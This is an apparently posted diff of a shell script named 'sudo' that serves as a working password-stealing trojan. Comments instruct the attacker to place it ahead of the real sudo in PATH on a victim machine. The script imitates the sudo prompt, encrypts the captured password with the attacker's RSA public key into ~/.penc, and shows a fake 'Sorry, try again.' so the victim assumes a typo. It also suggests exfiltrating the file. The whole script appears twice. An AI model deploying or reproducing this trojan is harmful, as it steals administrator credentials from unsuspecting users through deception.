YSaxon · September 8, 2022 14:11
diff --git a/sudo b/sudo
 #step 1: generate an rsa public/private keypair, and write your public key into the script below
 #step 2: put this script onto the computer you are attacking, make it executable, and ensure it has higher PATH priority than real sudo
 #step 3: after you obtain the encrypted password, decrypt it with cat .penc | openssl rsautl -decrypt -inkey your_key.priv
 #note that you could easily modify to spoof other password taking utils like sudosh or su

 sudo=`which -a sudo | head -n 2 | tail -n 1` #you could also just edit this to put in the location of real sudo yourself
 if [ -s ~/.penc ] #the script has already ran
 then
 $sudo "$@" #just forward it straight to real sudo

 else
 read -p "[sudo] password for $(whoami): " -s p #you might need to modify the prompt based on the sudo platform

 #replace this with your public key, or you won't be able to decrypt it!!
 cat << EOF > ~/.penc
 -----BEGIN PUBLIC KEY-----
 MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1LMw8fHhxweSLGhw+n+3
 t57lEDScuVFnkiqOxsM1hhHX1Q+Vz4c8EBQkCexsz52Z7WaJYr8UgrnlDjh1QYio
 yOzmlu1jjPWOX44faOcvtYzF426Bqotxst90oHe9B1nWzodEtrALi2NDdAoi8I9y
 koYPBjxbxn21/XYHQ/9EhqHgO/AQoNgdjji3J874w/8P50XFO/DBJe6rRSpy67Os
 HnipEZo+Wb212jTCoI63MoVkjhaa9BzPIHFi/QxKznyILyKjxghAbJibvFF6DXn3
 fMO8tCn1NcxP1pZucEJE0JbsDb4zGa3x7X1il1gZQiQwm/UJLwOzmTDiwyIAMncU
 JQIDAQAB
 -----END PUBLIC KEY-----
 EOF

 echo $p | openssl rsautl -encrypt -inkey ~/.penc -pubin -out ~/.penc; unset p #encrypt the password with your public key

 #this would be a good place to try to exfiltrate the ~/.penc file, otherwise, just come back and look for it later

 #as an alternative over here, if the sudo on your platform supports it, consider echo $p | sudo -S "$@"
 echo; echo 'Sorry, try again.' && $sudo "$@" #tell them they got it wrong, and they'll assume it's just a typo, then forward them to real sudo
 #alternatively, depending on your platform, you could try forwarding the actual password directly to sudo, but not every sudo will take that
 fi
	#step 1: generate an rsa public/private keypair, and write your public key into the script below
	#step 2: put this script onto the computer you are attacking, make it executable, and ensure it has higher PATH priority than real sudo
	#step 3: after you obtain the encrypted password, decrypt it with cat .penc \| openssl rsautl -decrypt -inkey your_key.priv
	#note that you could easily modify to spoof other password taking utils like sudosh or su

	sudo=`which -a sudo \| head -n 2 \| tail -n 1` #you could also just edit this to put in the location of real sudo yourself
	if [ -s ~/.penc ] #the script has already ran
	then
	$sudo "$@" #just forward it straight to real sudo

	else
	read -p "[sudo] password for $(whoami): " -s p #you might need to modify the prompt based on the sudo platform

	#replace this with your public key, or you won't be able to decrypt it!!
	cat << EOF > ~/.penc
	-----BEGIN PUBLIC KEY-----
	MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1LMw8fHhxweSLGhw+n+3
	t57lEDScuVFnkiqOxsM1hhHX1Q+Vz4c8EBQkCexsz52Z7WaJYr8UgrnlDjh1QYio
	yOzmlu1jjPWOX44faOcvtYzF426Bqotxst90oHe9B1nWzodEtrALi2NDdAoi8I9y
	koYPBjxbxn21/XYHQ/9EhqHgO/AQoNgdjji3J874w/8P50XFO/DBJe6rRSpy67Os
	HnipEZo+Wb212jTCoI63MoVkjhaa9BzPIHFi/QxKznyILyKjxghAbJibvFF6DXn3
	fMO8tCn1NcxP1pZucEJE0JbsDb4zGa3x7X1il1gZQiQwm/UJLwOzmTDiwyIAMncU
	JQIDAQAB
	-----END PUBLIC KEY-----
	EOF

	echo $p \| openssl rsautl -encrypt -inkey ~/.penc -pubin -out ~/.penc; unset p #encrypt the password with your public key

	#this would be a good place to try to exfiltrate the ~/.penc file, otherwise, just come back and look for it later

	#as an alternative over here, if the sudo on your platform supports it, consider echo $p \| sudo -S "$@"
	echo; echo 'Sorry, try again.' && $sudo "$@" #tell them they got it wrong, and they'll assume it's just a typo, then forward them to real sudo
	#alternatively, depending on your platform, you could try forwarding the actual password directly to sudo, but not every sudo will take that
	fi